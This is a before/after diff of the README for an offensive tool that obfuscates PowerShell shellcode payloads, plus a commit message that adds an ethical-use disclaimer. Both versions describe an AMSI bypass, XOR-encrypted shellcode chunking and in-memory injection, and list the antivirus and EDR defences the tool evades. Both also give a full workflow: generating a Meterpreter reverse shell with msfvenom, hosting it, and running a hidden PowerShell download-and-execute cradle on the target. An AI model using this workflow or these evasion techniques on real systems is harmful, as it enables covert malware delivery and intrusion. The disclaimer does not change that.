README.md, before:

# AdaptixPowerShell - Advanced PowerShell Payload Obfuscator

An advanced PowerShell payload generator with Chimera-style obfuscation, XOR encryption, and aggressive anti-detection techniques.

## Features

### 🎭 Chimera-Style Obfuscation
- AMSI bypass string chunking
- `System.Management.Automation` string obfuscation
- `amsiInitFailed` field name obfuscation
- Random variable names (15-25 characters)
- Corporate-themed comments for legitimacy
- Random indentation
- Backtick injection in cmdlets

### 🔐 Payload Encryption & Chunking
- XOR encryption of shellcode
- Encrypted payload split into 2-5 chunks
- Random variable names for each chunk
- Runtime concatenation before decryption

### 🛡️ C# P/Invoke Obfuscation
- `kernel32.dll` split into 4 random const strings
- Random class names (replaces `Win32`)
- Random method names (replaces `VirtualAlloc`)
- Random delegate names (replaces `ShellcodeDelegate`)
- EntryPoint remapping

### 🥷 Stealth Features
- No `Write-Error` statements
- No `Write-Host` statements (except debug mode)
- Silent error handling
- No revealing comments

## Installation

```bash
git clone <repository-url>
cd hostpayload
chmod +x adaptixpowerShell.py
```

## Usage

### Basic Usage

```bash
# Generate obfuscated payload (default level 3)
python3 adaptixpowerShell.py shellcode.bin

# Specify obfuscation level (1-5)
python3 adaptixpowerShell.py shellcode.bin -l 4

# Enable debug mode
python3 adaptixpowerShell.py shellcode.bin -d

# Disable obfuscation
python3 adaptixpowerShell.py shellcode.bin --no-obfuscate
```

### Obfuscation Levels

- **Level 1**: Low obfuscation, faster execution
- **Level 2**: Medium obfuscation
- **Level 3**: High obfuscation (default)
- **Level 4**: Higher obfuscation
- **Level 5**: Maximum obfuscation

### Output

The script generates three delivery methods:

1. **Direct Download**:
   ```powershell
   powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://IP:PORT/payload.ps1')"
   ```

2. **Base64 Encoded**:
   ```powershell
   powershell -nop -w hidden -enc <base64_string>
   ```

3. **PowerShell File**: `<random>.ps1`

## Examples

### Generate Meterpreter Payload

```bash
# Generate raw shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=192.168.1.100 LPORT=443 \
  EXITFUNC=thread -f raw -o shell.bin

# Obfuscate with AdaptixPowerShell
python3 adaptixpowerShell.py shell.bin -l 4

# Start web server
python3 -m http.server 80

# Execute on target
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/xyz123.ps1')"
```

### Debug Mode

Use debug mode to verify decryption is working:

```bash
python3 adaptixpowerShell.py shellcode.bin -d
```

Debug output will show:
- Encrypted payload length
- Decryption key length
- Decrypted payload length
- First 16 bytes of decrypted shellcode

## How It Works

1. **AMSI Bypass**: Disables AMSI using reflection to access `amsiInitFailed` field
2. **Encryption**: XOR encrypts the shellcode with a random 16-byte key
3. **Chunking**: Splits encrypted payload into multiple variables
4. **Obfuscation**: Applies Chimera-style obfuscation techniques
5. **Decryption**: PowerShell decrypts XOR payload at runtime
6. **Injection**: Uses `VirtualAlloc` + `Marshal.Copy` for in-memory execution

## Obfuscation Techniques

### String Chunking
```powershell
# Before
$dll = "kernel32.dll"

# After
$vKudKDAuMJHv = "ker"
$DOOqHAdQjVXYBFc = "nel"
$knbATApFWUpN = "32."
$hNverCTTZdykJ = "dll"
$dll = $vKudKDAuMJHv + $DOOqHAdQjVXYBFc + $knbATApFWUpN + $hNverCTTZdykJ
```

### Payload Chunking
```powershell
[Byte[]] $chunk1 = 0x62,0xBE,0x41,0xB7...
[Byte[]] $chunk2 = 0xF7,0xF5,0xBB,0x2D...
[Byte[]] $chunk3 = 0x4D,0x90,0xF7,0x58...
[Byte[]] $encrypted = $chunk1 + $chunk2 + $chunk3
```

### C# Class Obfuscation
```csharp
// Before
public class Win32 {
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualAlloc(...);
}

// After
private const string vKudKDAuMJHv = "ker";
private const string DOOqHAdQjVXYBFc = "nel";
private const string knbATApFWUpN = "32.";
private const string hNverCTTZdykJ = "dll";

public class UwZtTEjJflziJLL {
    [DllImport(vKudKDAuMJHv + DOOqHAdQjVXYBFc + knbATApFWUpN + hNverCTTZdykJ, EntryPoint = "VirtualAlloc")]
    public static extern IntPtr nTUEhCagiLrPlou(...);
}
```

## Detection Evasion

### ✅ Bypassed/Obfuscated
- Static signature detection
- String-based AV signatures
- Hash-based detection (different each run)
- AMSI (bypassed)
- Simple obfuscation detection

### ⚠️ Still Detectable
- Behavioral analysis (memory allocation patterns)
- Advanced EDR with behavioral heuristics
- Network-based IDS/IPS (for download cradles)
- ETW (Event Tracing for Windows)

## Testing

Always test your payloads in a controlled environment:

```bash
# Create test shellcode (NOP sled)
python3 -c "import sys; sys.stdout.buffer.write(b'\x90' * 8)" > test.bin

# Generate payload
python3 adaptixpowerShell.py test.bin -l 3 -d

# Test execution (should not crash)
powershell -ExecutionPolicy Bypass -File generated_payload.ps1
```

## Troubleshooting

### Payload Not Executing

1. **Verify shellcode is correct architecture (x64 vs x86)**
2. **Check EXITFUNC in msfvenom** (use `thread` not `process`)
3. **Enable debug mode** to verify decryption
4. **Test with calc.exe payload** first

### PowerShell Syntax Errors

- Ensure Python script completed successfully
- Check for PowerShell version compatibility (requires PS 2.0+)
- Review generated `.ps1` file for syntax issues

## Credits

Inspired by:
- [Chimera](https://github.com/tokyoneon/Chimera) - PowerShell obfuscation
- [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) - Obfuscation techniques

## Disclaimer

**FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY**

This tool is intended for security professionals, penetration testers, and researchers conducting authorized security assessments. Unauthorized access to computer systems is illegal. The authors assume no liability for misuse of this tool.

## License

Use responsibly and only on systems you own or have explicit permission to test.

---

**Note**: This tool generates payloads that may be flagged by antivirus software. Always obtain proper authorization before testing.

Commit message:

Add comprehensive ethical use disclaimer
- Emphasize educational and research purposes only
- Highlight use for enhancing detection capabilities
- Require controlled environment testing
- Add legal warnings and liability disclaimers
- Make disclaimer prominent at top of README

README.md, after:

# AdaptixPowerShell - Advanced PowerShell Payload Obfuscator

An advanced PowerShell payload generator with Chimera-style obfuscation, XOR encryption, and aggressive anti-detection techniques.

## ⚠️ DISCLAIMER

**THIS PROJECT IS INTENDED FOR EDUCATIONAL PURPOSES AND SECURITY RESEARCH ONLY**

This tool is designed for:
- **Security research and study**: Understanding obfuscation techniques and payload delivery mechanisms
- **Enhancing detection capabilities**: Helping blue teams and security researchers improve their detection rules and defensive strategies
- **Authorized penetration testing**: Only in controlled environments with explicit written permission

### Important Requirements:
- ✅ **MUST** be used only in controlled, isolated laboratory environments
- ✅ **MUST** have explicit written authorization before testing on any system
- ✅ **MUST NOT** be used for unauthorized access or malicious purposes
- ⚠️ Unauthorized access to computer systems is **illegal** and may result in severe legal consequences

The authors and contributors assume **NO LIABILITY** for misuse, damage, or illegal activities conducted with this tool. By using this software, you agree to use it responsibly and in accordance with all applicable laws and regulations.

---

## Features

### 🎭 Chimera-Style Obfuscation
- AMSI bypass string chunking
- `System.Management.Automation` string obfuscation
- `amsiInitFailed` field name obfuscation
- Random variable names (15-25 characters)
- Random indentation
- Backtick injection in cmdlets

### 🔐 Payload Encryption & Chunking
- XOR encryption of shellcode
- Encrypted payload split into 2-5 chunks
- Random variable names for each chunk
- Runtime concatenation before decryption

### 🛡️ C# P/Invoke Obfuscation
- `kernel32.dll` split into 4 random const strings
- Random class names (replaces `Win32`)
- Random method names (replaces `VirtualAlloc`)
- Random delegate names (replaces `ShellcodeDelegate`)
- EntryPoint remapping



## Installation

```bash
git clone <repository-url>
cd hostpayload
chmod +x adaptixpowerShell.py
```

## Usage

### Basic Usage

```bash
# Generate obfuscated payload (default level 3)
python3 adaptixpowerShell.py shellcode.bin

# Specify obfuscation level (1-5)
python3 adaptixpowerShell.py shellcode.bin -l 4

# Enable debug mode
python3 adaptixpowerShell.py shellcode.bin -d

# Disable obfuscation
python3 adaptixpowerShell.py shellcode.bin --no-obfuscate
```

### Obfuscation Levels

- **Level 1**: Low obfuscation, faster execution
- **Level 2**: Medium obfuscation
- **Level 3**: High obfuscation (default)
- **Level 4**: Higher obfuscation
- **Level 5**: Maximum obfuscation

### Output

The script generates three delivery methods:

1. **Direct Download**:
   ```powershell
   powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://IP:PORT/payload.ps1')"
   ```

2. **Base64 Encoded**:
   ```powershell
   powershell -nop -w hidden -enc <base64_string>
   ```

3. **PowerShell File**: `<random>.ps1`

## Examples

### Generate Meterpreter Payload

```bash
# Generate raw shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=192.168.1.100 LPORT=443 \
  EXITFUNC=thread -f raw -o shell.bin

# Obfuscate with AdaptixPowerShell
python3 adaptixpowerShell.py shell.bin -l 4

# Start web server
python3 -m http.server 80

# Execute on target
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/xyz123.ps1')"
```

### Debug Mode

Use debug mode to verify decryption is working:

```bash
python3 adaptixpowerShell.py shellcode.bin -d
```

Debug output will show:
- Encrypted payload length
- Decryption key length
- Decrypted payload length
- First 16 bytes of decrypted shellcode

## How It Works

1. **AMSI Bypass**: Disables AMSI using reflection to access `amsiInitFailed` field
2. **Encryption**: XOR encrypts the shellcode with a random 16-byte key
3. **Chunking**: Splits encrypted payload into multiple variables
4. **Obfuscation**: Applies Chimera-style obfuscation techniques
5. **Decryption**: PowerShell decrypts XOR payload at runtime
6. **Injection**: Uses `VirtualAlloc` + `Marshal.Copy` for in-memory execution

## Obfuscation Techniques

### String Chunking
```powershell
# Before
$dll = "kernel32.dll"

# After
$vKudKDAuMJHv = "ker"
$DOOqHAdQjVXYBFc = "nel"
$knbATApFWUpN = "32."
$hNverCTTZdykJ = "dll"
$dll = $vKudKDAuMJHv + $DOOqHAdQjVXYBFc + $knbATApFWUpN + $hNverCTTZdykJ
```

### Payload Chunking
```powershell
[Byte[]] $chunk1 = 0x62,0xBE,0x41,0xB7...
[Byte[]] $chunk2 = 0xF7,0xF5,0xBB,0x2D...
[Byte[]] $chunk3 = 0x4D,0x90,0xF7,0x58...
[Byte[]] $encrypted = $chunk1 + $chunk2 + $chunk3
```

### C# Class Obfuscation
```csharp
// Before
public class Win32 {
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualAlloc(...);
}

// After
private const string vKudKDAuMJHv = "ker";
private const string DOOqHAdQjVXYBFc = "nel";
private const string knbATApFWUpN = "32.";
private const string hNverCTTZdykJ = "dll";

public class UwZtTEjJflziJLL {
    [DllImport(vKudKDAuMJHv + DOOqHAdQjVXYBFc + knbATApFWUpN + hNverCTTZdykJ, EntryPoint = "VirtualAlloc")]
    public static extern IntPtr nTUEhCagiLrPlou(...);
}
```

## Detection Evasion

### ✅ Bypassed/Obfuscated
- Static signature detection
- String-based AV signatures
- Hash-based detection (different each run)
- AMSI (bypassed)
- Simple obfuscation detection

### ⚠️ Still Detectable
- Behavioral analysis (memory allocation patterns)
- Advanced EDR with behavioral heuristics
- Network-based IDS/IPS (for download cradles)
- ETW (Event Tracing for Windows)

## Testing

Always test your payloads in a controlled environment:

```bash
# Create test shellcode (NOP sled)
python3 -c "import sys; sys.stdout.buffer.write(b'\x90' * 8)" > test.bin

# Generate payload
python3 adaptixpowerShell.py test.bin -l 3 -d

# Test execution (should not crash)
powershell -ExecutionPolicy Bypass -File generated_payload.ps1
```

## Troubleshooting

### Payload Not Executing

1. **Verify shellcode is correct architecture (x64 vs x86)**
2. **Check EXITFUNC in msfvenom** (use `thread` not `process`)
3. **Enable debug mode** to verify decryption




## Credits

Inspired by:
- [Chimera](https://github.com/tokyoneon/Chimera) - PowerShell obfuscation
- [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) - Obfuscation techniques

## License

This project is provided "as-is" for educational and research purposes. Use responsibly and only in controlled environments or on systems you own or have explicit written permission to test.

---

**Note**: This tool generates payloads that may be flagged by antivirus and EDR software. Always test in isolated, controlled environments and obtain proper authorization before any security assessment.
